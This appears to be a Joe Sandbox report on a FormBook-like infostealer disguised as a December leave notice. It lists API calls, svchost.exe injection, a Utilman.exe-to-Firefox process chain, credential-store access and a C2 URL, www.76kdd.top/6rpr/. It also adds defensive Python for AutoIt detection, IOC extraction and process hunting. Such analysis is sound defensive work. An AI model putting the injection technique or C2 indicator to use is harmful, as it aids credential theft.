Source: Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000000.2105902097.000000000102E000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4a33f228-4
Source: Mandatory Notice for all December Leave and Vacation application.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_3b6da2df-1
Source: Mandatory Notice for all December Leave and Vacation application.exe | String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a934a1e1-5
Source: initial sample | Static PE information: Filename: Mandatory Notice for all December Leave and Vacation application.exe
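The "compiled AutoIt script" rows above rest on one runtime string. When a report like this lands in triage, the usual next step is a static re-check that does not depend on the sandbox: look for that message string and for the AutoIt3 script resource header that compiled scripts carry. The Python below is an added example for this page, not Joe Sandbox's detector and not code from the sample; the marker bytes are the publicly documented AutoIt3 resource magic and "AU3!EA06" format tag, and the embedded SAMPLE is constructed filler, not the analysed file.

```python
"""Static check for compiled-AutoIt markers in a PE image.

Added example for this report, not Joe Sandbox's own detector. It looks for
the runtime message string the report quotes and for the AutoIt3 script
resource header (16-byte magic followed by the "AU3!EA06" format tag).
"""

# Error text embedded in every AutoIt3 runtime stub; the report found it in
# the sample file and in its mapped image.
AUTOIT_MESSAGE = b"This is a third-party compiled AutoIt script."
# Resource magic and format tag that precede the compiled script body.
AU3_MAGIC = bytes.fromhex("a3484bbe986c4aa9994c530a86d6487d")
AU3_TAG = b"AU3!EA06"


def autoit_indicators(data: bytes) -> dict:
    """Offset of each marker in `data`, or -1 when it is absent."""
    return {
        "runtime_message": data.find(AUTOIT_MESSAGE),
        "au3_magic": data.find(AU3_MAGIC),
        "au3_tag": data.find(AU3_TAG),
    }


def is_compiled_autoit(data: bytes) -> bool:
    """Require two independent markers so one stray string is not a verdict."""
    hits = autoit_indicators(data)
    return sum(1 for off in hits.values() if off >= 0) >= 2


def scan_file(path: str) -> dict:
    """Read a file from disk and return its indicator offsets."""
    with open(path, "rb") as fh:
        return autoit_indicators(fh.read())


# Constructed stand-in for a binary: filler bytes with the markers embedded.
# These are not the bytes of the analysed sample.
SAMPLE = (b"MZ" + b"\x00" * 64 + AUTOIT_MESSAGE + b"\x00" * 16
          + AU3_MAGIC + AU3_TAG + b"\x00" * 8)

if __name__ == "__main__":
    print(autoit_indicators(SAMPLE), is_compiled_autoit(SAMPLE))
```

Treat a hit as a triage hint only: plenty of legitimate tooling is compiled AutoIt, and a packed sample hides both markers until it is unpacked, which is why the report phrases its own signature as "likely". If the markers are present, the next step is extracting and decompiling the script resource, since the AutoIt stub itself is benign and the behaviour lives in the script.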
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_0042C773: NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972B60: NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972DF0: NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_039735C0: NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03974340: NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03974650: NtSuspendThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972B80: NtQueryInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972BA0: NtEnumerateValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972BF0: NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972BE0: NtQueryValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972AB0: NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972AD0: NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972AF0: NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972F90: NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972FB0: NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972FA0: NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972FE0: NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972F30: NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972F60: NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972E80: NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972EA0: NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972EE0: NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972E30: NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972DB0: NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972DD0: NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972D10: NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972D00: NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972D30: NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972CA0: NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972CC0: NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972CF0: NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972C00: NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972C70: NtFreeVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03972C60: NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03973090: NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03973010: NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_039739B0: NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03973D10: NtOpenProcessToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function 2_2_03973D70: NtOpenThread
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function 0_2_00FC6685: CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function 0_2_00FBACC5: _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function 0_2_00FC79D3: ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
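Two groups of rows on this page are worth machine-reading rather than eyeballing: the "String found in binary or memory" rows, where the www.76kdd.top/6rpr/ string from eAdBvdCMNQkVZK.exe memory sits among search-engine defaults, Microsoft login endpoints and a registrar's parked page (the hover.com strings literally carry source=parked) that a host process such as Utilman.exe holds anyway; and the svchost.exe code-function rows, each a wrapper around a single Nt* call. The Python below is an added example for this page, not Joe Sandbox code: it parses rows in the format printed here (including the run-together form such as "...sdmpString found in binary or memory:"), groups URLs by host, flags hosts outside an allowlist that is my own assumption, and inventories the Nt* wrappers by address region, calling out the open/write/map/execute primitives that correspond to the thread-injection and APC signatures in the summary. The embedded rows are copied from this report; their selection is a constructed subset.

```python
"""Extract IOCs and an Nt* API inventory from Joe Sandbox signature rows.

Added example, not Joe Sandbox code. It reads rows as they appear on this
page, whether column-separated with " | " or run together.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Rows copied from this report; the selection is a constructed subset.
ROWS = [
    "Source: eAdBvdCMNQkVZK.exe, 00000007.00000002.4582285019.0000000005592000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.76kdd.top/6rpr/",
    "Source: eAdBvdCMNQkVZK.exe, 00000007.00000002.4582285019.0000000005592000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.76kdd.top",
    "Source: Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=",
    "Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/domains/results",
    "Source: Utilman.exe, 00000005.00000002.4579598695.0000000002B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033",
    "Source: C:\\Windows\\SysWOW64\\svchost.exeCode function: 2_2_0042C773 NtClose,2_2_0042C773",
    "Source: C:\\Windows\\SysWOW64\\svchost.exeCode function: 2_2_03972B60 NtClose,LdrInitializeThunk,2_2_03972B60",
    "Source: C:\\Windows\\SysWOW64\\svchost.exeCode function: 2_2_03972EE0 NtQueueApcThread,2_2_03972EE0",
    "Source: C:\\Windows\\SysWOW64\\svchost.exe | Code function 2_2_03974340: NtSetContextThread",
    "Source: C:\\Windows\\SysWOW64\\svchost.exeCode function: 2_2_03972E30 NtWriteVirtualMemory,2_2_03972E30",
    "Source: C:\\Windows\\SysWOW64\\svchost.exeCode function: 2_2_03972D10 NtMapViewOfSection,2_2_03972D10",
    "Source: C:\\Windows\\SysWOW64\\svchost.exeCode function: 2_2_03972CF0 NtOpenProcess,2_2_03972CF0",
    "Source: C:\\Windows\\SysWOW64\\svchost.exeCode function: 2_2_03972F60 NtCreateProcessEx,2_2_03972F60",
]

STRING_RE = re.compile(r"^Source:\s*(?P<src>.*?)\s*\|?\s*String found in binary or memory:\s*(?P<val>\S+)")
CODE_RE = re.compile(r"^Source:\s*(?P<src>.*?)\s*\|?\s*Code function:?\s*(?P<fid>\d+_\d+_[0-9A-Fa-f]{8}):?\s*(?P<calls>.*)$")

# Hosts an analyst expects in a browser-capable host process (search-engine
# defaults, Microsoft account endpoints) and on a registrar's parked page.
# This allowlist is an assumption made for the example, not report data.
BENIGN_SUFFIXES = ("ecosia.org", "duckduckgo.com", "search.yahoo.com", "login.live.com",
                   "hover.com", "fonts.googleapis.com", "twitter.com", "instagram.com")

# Nt* calls that together give open / write / map / execute in another process.
INJECTION_PRIMITIVES = {"NtOpenProcess", "NtAllocateVirtualMemory", "NtWriteVirtualMemory",
                        "NtMapViewOfSection", "NtProtectVirtualMemory", "NtQueueApcThread",
                        "NtSetContextThread", "NtResumeThread", "NtCreateProcessEx"}


def is_allowlisted(host: str) -> bool:
    """Exact host or a subdomain of an allowlisted suffix; no substring matching."""
    return any(host == s or host.endswith("." + s) for s in BENIGN_SUFFIXES)


def parse_rows(rows):
    """Return (process, url) string hits and {function id: (source, [calls])}."""
    urls, funcs = [], {}
    for row in rows:
        m = STRING_RE.match(row)
        if m:
            proc = m.group("src").split(",")[0].strip()   # drop the dump id
            urls.append((proc, m.group("val")))
            continue
        m = CODE_RE.match(row)
        if m:
            fid = m.group("fid")
            # The trailing repeated id in the run-together form is not a call.
            calls = [c for c in m.group("calls").split(",") if c and c != fid]
            funcs[fid] = (m.group("src").strip(), calls)
    return urls, funcs


def classify_urls(urls):
    """Group URLs by host; a host off the allowlist is a C2 candidate."""
    hosts = defaultdict(lambda: {"benign": True, "paths": set(), "processes": set()})
    for proc, url in urls:
        parts = urlsplit(url)
        entry = hosts[parts.netloc]
        entry["benign"] = is_allowlisted(parts.netloc)
        if parts.path and parts.path != "/":
            entry["paths"].add(parts.path)
        entry["processes"].add(proc)
    return dict(hosts)


def nt_inventory(funcs):
    """Nt* wrappers per address region plus the injection primitives present."""
    by_region, apis = defaultdict(list), set()
    for fid, (_, calls) in funcs.items():
        nt = [c for c in calls if c.startswith("Nt")]
        if not nt:
            continue
        apis.update(nt)
        region = fid.rsplit("_", 1)[1][:4]   # "0042" (own image) vs "0397"
        by_region[region].append(fid)
    return {"apis": sorted(apis),
            "injection_primitives": sorted(apis & INJECTION_PRIMITIVES),
            "by_region": {k: sorted(v) for k, v in by_region.items()}}


def triage(rows):
    """One-shot summary: C2 candidates, per-host detail, Nt* inventory."""
    urls, funcs = parse_rows(rows)
    hosts = classify_urls(urls)
    return {"c2_candidates": sorted(h for h, e in hosts.items() if not e["benign"]),
            "hosts": hosts, "nt": nt_inventory(funcs)}


if __name__ == "__main__":
    result = triage(ROWS)
    for host in result["c2_candidates"]:
        detail = result["hosts"][host]
        print(host, sorted(detail["paths"]), sorted(detail["processes"]))
    print("injection primitives:", result["nt"]["injection_primitives"])
    print("wrappers by region:", result["nt"]["by_region"])
```

The allowlist decides what is flagged, so www.76kdd.top surfaces because nothing vouches for it, not because the parser knows FormBook; extend the list with whatever the host process legitimately touches in your environment, and keep the path (/6rpr/) with the host, since a domain alone is a weak indicator. The by_region split separates the wrapper inside svchost.exe's own image (2_2_0042C773) from the 0x0397xxxx block; this section does not say which module that block belongs to, so attribution stays with the memory dumps rather than with the parser.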
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code functions (34 listed):
0_2_00FAB043, 0_2_00F93200, 0_2_00F93B70, 0_2_00FB410F, 0_2_00FA02A4, 0_2_00F8E3B0, 0_2_00FB038E, 0_2_00FA06D9,
0_2_00FB467F, 0_2_00FEAACE, 0_2_00FB4BEF, 0_2_00FACCC1, 0_2_00F8AF50, 0_2_00F86F07, 0_2_00FE31BC, 0_2_00FAD1B9,
0_2_00F9B11F, 0_2_00FB724D, 0_2_00FA123A, 0_2_00F893F0, 0_2_00FC13CA, 0_2_00F9F563, 0_2_00FCB6CC, 0_2_00F896C0,
0_2_00FEF7FF, 0_2_00F877B0, 0_2_00FB79C9, 0_2_00F9FA57, 0_2_00F89B60, 0_2_00F87D19, 0_2_00FA9ED0, 0_2_00F9FE6F,
0_2_00F87FA3, 0_2_01A4D3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code functions (104 listed):
2_2_00418633, 2_2_0040E013, 2_2_00410023, 2_2_00416833, 2_2_00401140, 2_2_0040E158, 2_2_0040E163, 2_2_004041AF,
2_2_00404314, 2_2_00401CA0, 2_2_0040FDFB, 2_2_0042ED93, 2_2_0040FE03, 2_2_00402ED0, 2_2_03A003E6, 2_2_0394E3F0,
2_2_039FA352, 2_2_039C02C0, 2_2_039E0274, 2_2_03A001AA, 2_2_039F41A2, 2_2_039F81CC, 2_2_039DA118, 2_2_03930100,
2_2_039C8158, 2_2_039D2000, 2_2_0393C7C0, 2_2_03964750, 2_2_03940770, 2_2_0395C6E0, 2_2_03A00591, 2_2_03940535,
2_2_039EE4F6, 2_2_039E4420, 2_2_039F2446, 2_2_039F6BD7, 2_2_039FAB40, 2_2_0393EA80, 2_2_03A0A9A6, 2_2_039429A0,
2_2_03956962, 2_2_039268B8, 2_2_0396E8F0, 2_2_0394A840, 2_2_03942840, 2_2_039BEFA0, 2_2_03932FC8, 2_2_0394CFE0,
2_2_03960F30, 2_2_039E2F30, 2_2_03982F28, 2_2_039B4F40, 2_2_03952E90, 2_2_039FCE93, 2_2_039FEEDB, 2_2_0393AE0D,
2_2_039FEE26, 2_2_03940E59, 2_2_03958DBF, 2_2_039DCD1F, 2_2_0394AD00, 2_2_039E0CB5, 2_2_03930CF2, 2_2_03940C00,
2_2_0398739A, 2_2_039F132D, 2_2_0392D34C, 2_2_039452A0, 2_2_0395B2C0, 2_2_039E12ED, 2_2_0394B1B0, 2_2_03A0B16B,
2_2_0392F172, 2_2_0397516C, 2_2_039EF0CC, 2_2_039470C0, 2_2_039F70E9, 2_2_039FF0E0, 2_2_039FF7B0, 2_2_039F16CC,
2_2_03985630, 2_2_039DD5B0, 2_2_03A095C3, 2_2_039F7571, 2_2_039FF43F, 2_2_03931460, 2_2_0395FB80, 2_2_039B5BF0,
2_2_0397DBF9, 2_2_039FFB76, 2_2_039DDAAC, 2_2_03985AA0, 2_2_039E1AA3, 2_2_039EDAC6, 2_2_039FFA49, 2_2_039F7A46,
2_2_039B3A6C, 2_2_039D5910, 2_2_03949950, 2_2_0395B950, 2_2_039438E0, 2_2_039AD800, 2_2_03941F92, 2_2_039FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFF092_2_039FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03949EB02_2_03949EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FDC02_2_0395FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F1D5A2_2_039F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03943D402_2_03943D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7D732_2_039F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFCF22_2_039FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B9C322_2_039B9C32
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: String function: 00F9EC2F appears 68 times
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: String function: 00FA6AC0 appears 42 times
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: String function: 00FAF8A0 appears 35 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 039BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0392B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03975130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 039AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03987E54 appears 111 times
Source: Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000003.2126730837.00000000041DD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Mandatory Notice for all December Leave and Vacation application.exe
Source: Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000003.2127040179.0000000004033000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Mandatory Notice for all December Leave and Vacation application.exe
Source: Mandatory Notice for all December Leave and Vacation application.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@7/7
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FCCE7A GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FBAB84 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FBB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FCE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FC6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FDC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00F8406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | File created: C:\Users\user\AppData\Local\Temp\autB2CC.tmp
Source: Mandatory Notice for all December Leave and Vacation application.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Utilman.exe, 00000005.00000003.2699098393.0000000002BA8000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4579598695.0000000002BB3000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4579598695.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000005.00000003.2698993095.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4579598695.0000000002BA8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Mandatory Notice for all December Leave and Vacation application.exe | ReversingLabs: Detection: 36%
Source: unknown | Process created: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe"
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe"
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | Process created: C:\Windows\SysWOW64\Utilman.exe "C:\Windows\SysWOW64\Utilman.exe"
Source: C:\Windows\SysWOW64\Utilman.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
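The process chain listed above is the part of this report most worth turning into a hunting rule: svchost.exe is started by the phishing sample and carries the sample's own command line rather than its own, Utilman.exe (a Windows accessibility helper) is started by an executable under a random-named Program Files (x86) directory, and Utilman.exe in turn launches Firefox. The following is an added example, not part of the Joe Sandbox report: a small Python triage rule set run over process-creation events constructed from the "Process created" lines above. The field names, rule names and the list of accessibility binaries are this example's own assumptions; a real pipeline would map Sysmon Event ID 1 or EDR telemetry onto the same three fields.

```python
"""Triage rules for the process chain this report lists (added example)."""
import ntpath

# Constructed from the "Process created" lines of the report: image path,
# command line and parent image exactly as the report gives them.
EVENTS = [
    {"image": r"C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe",
     "cmdline": r'"C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe"',
     "parent": None},
    {"image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe"',
     "parent": r"C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe"},
    {"image": r"C:\Windows\SysWOW64\Utilman.exe",
     "cmdline": r'"C:\Windows\SysWOW64\Utilman.exe"',
     "parent": r"C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe"},
    {"image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"',
     "parent": r"C:\Windows\SysWOW64\Utilman.exe"},
]

BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
# Accessibility helpers (assumed list): legitimately started by winlogon.exe,
# explorer.exe or another binary under C:\Windows, never from a user-writable path.
ACCESSIBILITY_TOOLS = {"utilman.exe", "sethc.exe", "osk.exe", "narrator.exe", "magnify.exe"}


def first_cmdline_token(cmdline):
    """Return the program part of a Windows command line (quoted or bare)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def base(path):
    """Lower-cased file name of a Windows path; '' for a missing parent."""
    return ntpath.basename(path).lower() if path else ""


def evaluate(event):
    """Return the names of the rules an event trips (empty list if none)."""
    hits = []
    image, parent = base(event["image"]), base(event["parent"])
    claimed = base(first_cmdline_token(event["cmdline"]))
    parent_dir = ntpath.dirname(event["parent"] or "").lower()

    # A process whose command line names a different executable than its image
    # is the fingerprint of injection with a spoofed command line: here
    # svchost.exe runs with the phishing sample's command line.
    if claimed and claimed != image:
        hits.append("cmdline_image_mismatch")
    # A genuine svchost.exe is started by services.exe and nothing else.
    if image == "svchost.exe" and parent != "services.exe":
        hits.append("svchost_unexpected_parent")
    # Accessibility tool started from outside C:\Windows, as Utilman.exe is here.
    if image in ACCESSIBILITY_TOOLS and not parent_dir.startswith(r"c:\windows"):
        hits.append("accessibility_tool_nonsystem_parent")
    # A browser launched by an accessibility tool: the Utilman.exe -> firefox.exe hop.
    if image in BROWSERS and parent in ACCESSIBILITY_TOOLS:
        hits.append("browser_from_accessibility_tool")
    return hits


def triage(events):
    """Map each flagged image path to the rules it tripped."""
    return {e["image"]: hits for e in events if (hits := evaluate(e))}


if __name__ == "__main__":
    for image, rules in triage(EVENTS).items():
        print(image, "->", ", ".join(rules))
```

The command-line/image mismatch is the highest-value rule of the four: it does not depend on knowing which system binary the injector picked (FormBook chooses one at random from a list), only on comparing two fields every process-creation event already carries.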
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Sections loaded: apphelp.dll, wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, ntmarta.dll
Source: C:\Windows\SysWOW64\Utilman.exe | Sections loaded: oleacc.dll, duser.dll, dui70.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | Sections loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
Source: C:\Windows\SysWOW64\Utilman.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Windows\SysWOW64\Utilman.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Mandatory Notice for all December Leave and Vacation application.exe | Static file information: File size 1207808 > 1048576
Source: Mandatory Notice for all December Leave and Vacation application.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Mandatory Notice for all December Leave and Vacation application.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Mandatory Notice for all December Leave and Vacation application.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Mandatory Notice for all December Leave and Vacation application.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Mandatory Notice for all December Leave and Vacation application.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Mandatory Notice for all December Leave and Vacation application.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Mandatory Notice for all December Leave and Vacation application.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
